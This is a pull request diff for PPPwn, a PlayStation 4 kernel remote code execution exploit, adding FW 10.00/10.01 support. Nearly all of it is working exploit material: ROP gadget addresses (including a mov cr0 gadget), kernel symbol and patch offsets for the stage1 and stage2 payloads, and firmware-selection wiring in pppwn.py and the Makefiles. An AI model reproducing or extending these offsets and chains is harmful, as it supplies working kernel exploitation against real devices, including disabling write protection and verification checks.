### PR TITLE
Adapt for 10.00 compatibility; rearrange code a bit

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,6 +3,7 @@ PPPwn is a kernel remote code execution exploit for PlayStation 4 upto FW 11.00.
 
 Supported versions are:
 - FW 9.00
+- FW 10.00/10.01
 - FW 11.00
 - more can be added (PRs are welcome)
 

--- a/offsets.py
+++ b/offsets.py
@@ -99,7 +99,7 @@ class OffsetsFirmware_900:
     JMP_R14 = 0xffffffff82b85693
 
 
-# FW 10.00
+# FW 10.00/10.01
 class OffsetsFirmware_1000:
     PPPOE_SOFTC_LIST = 0xffffffff8446d920
 
@@ -113,6 +113,7 @@ class OffsetsFirmware_1000:
 
     MEMCPY = 0xffffffff82672d20
 
+    # mov cr0 rsi ; ud2 ; mov eax 1; ret
     MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089 # 0F 22 C6 48 F7 C6
 
     SECOND_GADGET_OFF = 0x3b # 3? (e.g 3a, 3b, 3c, 3d, 3e..)

--- a/offsets.py
+++ b/offsets.py
@@ -99,6 +99,100 @@ class OffsetsFirmware_900:
     JMP_R14 = 0xffffffff82b85693
 
 
+# FW 10.00
+class OffsetsFirmware_1000:
+    PPPOE_SOFTC_LIST = 0xffffffff8446d920
+
+    KERNEL_MAP = 0xffffffff8447bef8
+
+    SETIDT = 0xffffffff8227b460
+
+    KMEM_ALLOC = 0xffffffff8253b040
+    KMEM_ALLOC_PATCH1 = 0xffffffff8253b10c
+    KMEM_ALLOC_PATCH2 = 0xffffffff8253b114
+
+    MEMCPY = 0xffffffff82672d20
+
+    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089 # 0F 22 C6 48 F7 C6
+
+    SECOND_GADGET_OFF = 0x3b # 3? (e.g 3a, 3b, 3c, 3d, 3e..)
+
+    # jmp qword ptr [rsi + 0x3b]
+    FIRST_GADGET = 0xffffffff82249c5d # FF 66 3?
+
+    # push rbp ; jmp qword ptr [rsi]
+    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c73946 # 55 FF 26
+
+    # pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
+    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82545741 # 5B 41 5E 5D FF 66 10
+
+    # lea rsp, [rsi + 0x20] ; repz ret
+    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8292b346 # 48 8D 66 20 F3 C3
+
+    # add rsp, 0x28 ; pop rbp ; ret
+    ADD_RSP_28_POP_RBP_RET = 0xffffffff826d0d0a # 48 83 C4 28 5D C3
+
+    # add rsp, 0xb0 ; pop rbp ; ret
+    ADD_RSP_B0_POP_RBP_RET = 0xffffffff82531c3f # 48 81 C4 B0 00 00 00 5D C3
+
+    # ret
+    RET = 0xffffffff822008e0 # C3
+
+    # pop rdi ; ret
+    POP_RDI_RET = 0xffffffff82510c4e # 5F C3
+
+    # pop rsi ; ret
+    POP_RSI_RET = 0xffffffff822983e0 # 5E C3
+
+    # pop rdx ; ret
+    POP_RDX_RET = 0xffffffff824029b2 # 5A C3
+
+    # pop rcx ; ret
+    POP_RCX_RET = 0xffffffff822983ba # 59 C3
+
+    # pop r8 ; pop rbp ; ret
+    POP_R8_POP_RBP_RET = 0xffffffff8237dd7d # 47 58 5D C3
+
+    # pop r12 ; ret
+    POP_R12_RET = 0xffffffff827b32ef # 41 5C C3
+
+    # pop rax ; ret
+    POP_RAX_RET = 0xffffffff8229974f # 58 C3
+
+    # pop rbp ; ret
+    POP_RBP_RET = 0xffffffff822008df # 5D C3
+
+    # push rsp ; pop rsi ; ret
+    PUSH_RSP_POP_RSI_RET = 0xffffffff82bb3ee6 # 54 5E C3
+
+    # mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
+    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8256bfb0  # 48 8B 3F 5D FF E0
+
+    # mov byte ptr [rcx], al ; ret
+    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff824f0448 # 88 01 C3
+
+    # mov rdi, rbx ; call r12
+    MOV_RDI_RBX_CALL_R12 = 0xffffffff8236bbec # 48 89 DF 41 FF D4
+
+    # mov rdi, r14 ; call r12
+    MOV_RDI_R14_CALL_R12 = 0xffffffff8236ba27 # 4C 89 F7 41 FF D4
+
+    # mov rsi, rbx ; call rax
+    MOV_RSI_RBX_CALL_RAX = 0xffffffff823f501e # 48 89 DE FF D0
+
+    # mov r14, rax ; call r8
+    MOV_R14_RAX_CALL_R8 = 0xffffffff8259e638 # 49 89 C6 41 FF D0
+
+    # add rdi, rcx ; ret
+    ADD_RDI_RCX_RET = 0xffffffff82cb3b3a # 48 03 F9 C3
+
+    # sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
+    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff822bfa87 # 48 29 D6 48 89 F0 5D C3
+
+    # jmp r14
+    JMP_R14 = 0xffffffff8280346f # 49 FF E6
+
+
 # FW 11.00
 class OffsetsFirmware_1100:
     PPPOE_SOFTC_LIST = 0xffffffff844e2578
@@ -192,98 +286,3 @@ class OffsetsFirmware_1100:
 
     # 0xffffffff82b84657 : jmp r14
     JMP_R14 = 0xffffffff82b84657
-
-
-# FW 10.01
-class OffsetsFirmware_1001:
-    PPPOE_SOFTC_LIST = 0xffffffff8446d920
-
-    KERNEL_MAP = 0xffffffff8447bef8
-
-    SETIDT = 0xffffffff8227b460
-
-    KMEM_ALLOC = 0xffffffff8253b040
-    KMEM_ALLOC_PATCH1 = 0xffffffff8253b10c
-    KMEM_ALLOC_PATCH2 = 0xffffffff8253b114
-
-    MEMCPY = 0xffffffff82672d20
-
-    # mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
-    MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089 # 0F 22 C6 48 F7 C6
-
-    SECOND_GADGET_OFF = 0x3b # 3? (e.g 3a, 3b, 3c, 3d, 3e..)
-
-    # jmp qword ptr [rsi + 0x3b]
-    FIRST_GADGET = 0xffffffff82249c5d # FF 66 3?
-
-    # push rbp ; jmp qword ptr [rsi]
-    PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c73946 # 55 FF 26
-
-    # pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
-    POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82545741 # 5B 41 5E 5D FF 66 10
-
-    # lea rsp, [rsi + 0x20] ; repz ret
-    LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8292b346 # 48 8D 66 20 F3 C3
-
-    # add rsp, 0x28 ; pop rbp ; ret
-    ADD_RSP_28_POP_RBP_RET = 0xffffffff826d0d0a # 48 83 C4 28 5D C3
-
-    # add rsp, 0xb0 ; pop rbp ; ret
-    ADD_RSP_B0_POP_RBP_RET = 0xffffffff82531c3f # 48 81 C4 B0 00 00 00 5D C3
-
-    # ret
-    RET = 0xffffffff822008e0 # C3
-
-    # pop rdi ; ret
-    POP_RDI_RET = 0xffffffff82510c4e # 5F C3
-
-    # pop rsi ; ret
-    POP_RSI_RET = 0xffffffff822983e0 # 5E C3
-
-    # pop rdx ; ret
-    POP_RDX_RET = 0xffffffff824029b2 # 5A C3
-
-    # pop rcx ; ret
-    POP_RCX_RET = 0xffffffff822983ba # 59 C3
-
-    # pop r8 ; pop rbp ; ret
-    POP_R8_POP_RBP_RET = 0xffffffff8237dd7d # C5 FB 11 47 58 5D C3
-
-    # pop r12 ; ret
-    POP_R12_RET = 0xffffffff827b32ef # 41 5C C3
-
-    # pop rax ; ret
-    POP_RAX_RET = 0xffffffff8229974f # 58 C3
-
-    # pop rbp ; ret
-    POP_RBP_RET = 0xffffffff822008df # 5D C3
-
-    # push rsp ; pop rsi ; ret
-    PUSH_RSP_POP_RSI_RET = 0xffffffff82bb3ee6 # 54 5E C3
-
-    # mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
-    MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8256bfb0  # 48 8B 3F 5D FF E0
-
-    # mov byte ptr [rcx], al ; ret
-    MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff824f0448 # 88 01 C3
-
-    # mov rdi, rbx ; call r12
-    MOV_RDI_RBX_CALL_R12 = 0xffffffff8236bbec # 48 89 DF 41 FF D4
-
-    # mov rdi, r14 ; call r12
-    MOV_RDI_R14_CALL_R12 = 0xffffffff8236ba27 # 4C 89 F7 41 FF D4
-
-    # mov rsi, rbx ; call rax
-    MOV_RSI_RBX_CALL_RAX = 0xffffffff823f501e # 48 89 DE FF D0
-
-    # mov r14, rax ; call r8
-    MOV_R14_RAX_CALL_R8 = 0xffffffff8259e638 # 49 89 C6 41 FF D0
-
-    # add rdi, rcx ; ret
-    ADD_RDI_RCX_RET = 0xffffffff82cb3b3a # 48 03 F9 C3
-
-    # sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
-    SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff822bfa87 # 48 29 D6 48 89 F0 5D C3
-
-    # jmp r14
-    JMP_R14 = 0xffffffff8280346f # 49 FF E6

--- a/pppwn.py
+++ b/pppwn.py
@@ -838,6 +838,8 @@ def main():
         offs = OffsetsFirmware_900()
     elif args.fw == '1000':
         offs = OffsetsFirmware_1000()
+    elif args.fw == '1001':
+        offs = OffsetsFirmware_1000()
     elif args.fw == '1100':
         offs = OffsetsFirmware_1100()
 

--- a/pppwn.py
+++ b/pppwn.py
@@ -836,9 +836,7 @@ def main():
 
     if args.fw == '900':
         offs = OffsetsFirmware_900()
-    elif args.fw == '1000':
-        offs = OffsetsFirmware_1000()
-    elif args.fw == '1001':
+    elif args.fw in ('1000', '1001'):
         offs = OffsetsFirmware_1000()
     elif args.fw == '1100':
         offs = OffsetsFirmware_1100()

--- a/pppwn.py
+++ b/pppwn.py
@@ -820,7 +820,7 @@ class Exploit():
 def main():
     parser = ArgumentParser('pppwn.py')
     parser.add_argument('--interface', required=True)
-    parser.add_argument('--fw', choices=['900', '1100', '1001'], default='1100')
+    parser.add_argument('--fw', choices=['900', '1000', '1100'], default='1100')
     parser.add_argument('--stage1', default='stage1/stage1.bin')
     parser.add_argument('--stage2', default='stage2/stage2.bin')
     args = parser.parse_args()
@@ -836,10 +836,10 @@ def main():
 
     if args.fw == '900':
         offs = OffsetsFirmware_900()
+    elif args.fw == '1000':
+        offs = OffsetsFirmware_1000()
     elif args.fw == '1100':
         offs = OffsetsFirmware_1100()
-    elif args.fw == '1001':
-        offs = OffsetsFirmware_1001()
 
     exploit = Exploit(offs, args.interface, stage1, stage2)
     exploit.run()

--- a/pppwn.py
+++ b/pppwn.py
@@ -820,7 +820,7 @@ class Exploit():
 def main():
     parser = ArgumentParser('pppwn.py')
     parser.add_argument('--interface', required=True)
-    parser.add_argument('--fw', choices=['900', '1000', '1100'], default='1100')
+    parser.add_argument('--fw', choices=['900', '1000', '1001', '1100'], default='1100')
     parser.add_argument('--stage1', default='stage1/stage1.bin')
     parser.add_argument('--stage2', default='stage2/stage2.bin')
     args = parser.parse_args()

--- a/stage1/Makefile
+++ b/stage1/Makefile
@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 1100 1001),)
+ifneq ($(filter $(FW), 900 1000 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

--- a/stage1/Makefile
+++ b/stage1/Makefile
@@ -6,11 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 1000 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
-else
-$(error "Invalid firmware")
-endif
 
 all: $(TARGET).bin
 

--- a/stage1/offsets.h
+++ b/stage1/offsets.h
@@ -36,6 +36,34 @@
 #define kdlsym_addr_uart_patch 0xffffffff8372bf60
 #define kdlsym_addr_veri_patch 0xffffffff82826874
 
+#elif FIRMWARE == 1000 // FW 10.00/10.01
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
+
+#define kdlsym_addr_pppoe_softc_list 0xffffffff8446d920
+
+#define kdlsym_addr_cc_cpu 0xffffffff844921b0
+#define kdlsym_addr_callwheelsize 0xffffffff844941b0
+
+#define kdlsym_addr_nd6_llinfo_timer 0xffffffff82651780
+
+#define kdlsym_addr_Xill 0xffffffff824d2370
+#define kdlsym_addr_setidt 0xffffffff8227b460
+
+#define kdlsym_addr_kernel_map 0xffffffff8447bef8
+#define kdlsym_addr_kmem_alloc 0xffffffff8253b040
+
+#define kdlsym_addr_kproc_create 0xffffffff82407d90
+#define kdlsym_addr_kproc_exit 0xffffffff82408000
+
+#define kdlsym_addr_ksock_create 0xffffffff82406a10
+#define kdlsym_addr_ksock_close 0xffffffff82406a80
+#define kdlsym_addr_ksock_bind 0xffffffff82406a90
+#define kdlsym_addr_ksock_recv 0xffffffff82406df0
+
+#define kdlsym_addr_uart_patch 0xffffffff83c78a78
+#define kdlsym_addr_veri_patch 0xffffffff8281e864
+
 #elif FIRMWARE == 1100 // FW 11.00
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
@@ -63,34 +91,6 @@
 
 #define kdlsym_addr_uart_patch 0xffffffff8372cff8
 #define kdlsym_addr_veri_patch 0xffffffff82823f64
-
-#elif FIRMWARE == 1001 // FW 10.01
-
-#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
-
-#define kdlsym_addr_pppoe_softc_list 0xffffffff8446d920
-
-#define kdlsym_addr_cc_cpu 0xffffffff844921b0
-#define kdlsym_addr_callwheelsize 0xffffffff844941b0
-
-#define kdlsym_addr_nd6_llinfo_timer 0xffffffff82651780
-
-#define kdlsym_addr_Xill 0xffffffff824d2370
-#define kdlsym_addr_setidt 0xffffffff8227b460
-
-#define kdlsym_addr_kernel_map 0xffffffff8447bef8
-#define kdlsym_addr_kmem_alloc 0xffffffff8253b040
-
-#define kdlsym_addr_kproc_create 0xffffffff82407d90
-#define kdlsym_addr_kproc_exit 0xffffffff82408000
-
-#define kdlsym_addr_ksock_create 0xffffffff82406a10
-#define kdlsym_addr_ksock_close 0xffffffff82406a80
-#define kdlsym_addr_ksock_bind 0xffffffff82406a90
-#define kdlsym_addr_ksock_recv 0xffffffff82406df0
-
-#define kdlsym_addr_uart_patch 0xffffffff83c78a78
-#define kdlsym_addr_veri_patch 0xffffffff8281e864
 
 #else
 

--- a/stage1/offsets.h
+++ b/stage1/offsets.h
@@ -36,7 +36,7 @@
 #define kdlsym_addr_uart_patch 0xffffffff8372bf60
 #define kdlsym_addr_veri_patch 0xffffffff82826874
 
-#elif FIRMWARE == 1000 // FW 10.00/10.01
+#elif (FIRMWARE == 1000 || FIRMWARE == 1001) // FW 10.00/10.01
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
 

--- a/stage2/Makefile
+++ b/stage2/Makefile
@@ -6,7 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 1100 1001),)
+ifneq ($(filter $(FW), 900 1000 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
 else
 $(error "Invalid firmware")

--- a/stage2/Makefile
+++ b/stage2/Makefile
@@ -6,11 +6,7 @@ OBJCOPY = objcopy
 CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector
 LDFLAGS = -T linker.ld -nostartfiles -nostdlib
 
-ifneq ($(filter $(FW), 900 1000 1100),)
 CFLAGS += -DFIRMWARE=$(FW)
-else
-$(error "Invalid firmware")
-endif
 
 all: $(TARGET).bin
 

--- a/stage2/offsets.h
+++ b/stage2/offsets.h
@@ -31,6 +31,28 @@
 #define kdlsym_addr_copyinstr_patch2 0xffffffff82471baf
 #define kdlsym_addr_copyinstr_patch3 0xffffffff82471be0
 
+#elif FIRMWARE == 1000 // FW 10.00/10.01
+
+#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
+#define kdlsym_addr_printf 0xffffffff822c50f0
+
+#define kdlsym_addr_sysent 0xffffffff83302d90
+
+#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490
+#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5
+#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9
+#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2
+
+#define kdlsym_addr_copyin_patch1 0xffffffff82672f67
+#define kdlsym_addr_copyin_patch2 0xffffffff82672f73
+
+#define kdlsym_addr_copyout_patch1 0xffffffff82672e72
+#define kdlsym_addr_copyout_patch2 0xffffffff82672e7e
+
+#define kdlsym_addr_copyinstr_patch1 0xffffffff82673413
+#define kdlsym_addr_copyinstr_patch2 0xffffffff8267341f
+#define kdlsym_addr_copyinstr_patch3 0xffffffff82673450
+
 #elif FIRMWARE == 1100 // FW 11.00
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
@@ -52,28 +74,6 @@
 #define kdlsym_addr_copyinstr_patch1 0xffffffff824de4e3
 #define kdlsym_addr_copyinstr_patch2 0xffffffff824de4ef
 #define kdlsym_addr_copyinstr_patch3 0xffffffff824de520
-
-#elif FIRMWARE == 1001 // FW 10.01
-
-#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
-#define kdlsym_addr_printf 0xffffffff822c50f0
-
-#define kdlsym_addr_sysent 0xffffffff83302d90
-
-#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490
-#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5
-#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9
-#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2
-
-#define kdlsym_addr_copyin_patch1 0xffffffff82672f67
-#define kdlsym_addr_copyin_patch2 0xffffffff82672f73
-
-#define kdlsym_addr_copyout_patch1 0xffffffff82672e72
-#define kdlsym_addr_copyout_patch2 0xffffffff82672e7e
-
-#define kdlsym_addr_copyinstr_patch1 0xffffffff82673413
-#define kdlsym_addr_copyinstr_patch2 0xffffffff8267341f
-#define kdlsym_addr_copyinstr_patch3 0xffffffff82673450
 
 #else
 

--- a/stage2/offsets.h
+++ b/stage2/offsets.h
@@ -31,7 +31,7 @@
 #define kdlsym_addr_copyinstr_patch2 0xffffffff82471baf
 #define kdlsym_addr_copyinstr_patch3 0xffffffff82471be0
 
-#elif FIRMWARE == 1000 // FW 10.00/10.01
+#elif (FIRMWARE == 1000 || FIRMWARE == 1001) // FW 10.00/10.01
 
 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0
 #define kdlsym_addr_printf 0xffffffff822c50f0


### PR DESCRIPTION
Re-arranged code blocks so that 10.00 comes after 9.00 but before 11.00;

Changed the `POP_R8_POP_RBP_RET` value so that it works with both 10.00 and 10.01;

Changed the `FW`/`--fw` value to 10.00 because it sort of makes more sense that "10.01 is almost like 10.00" than the other way around.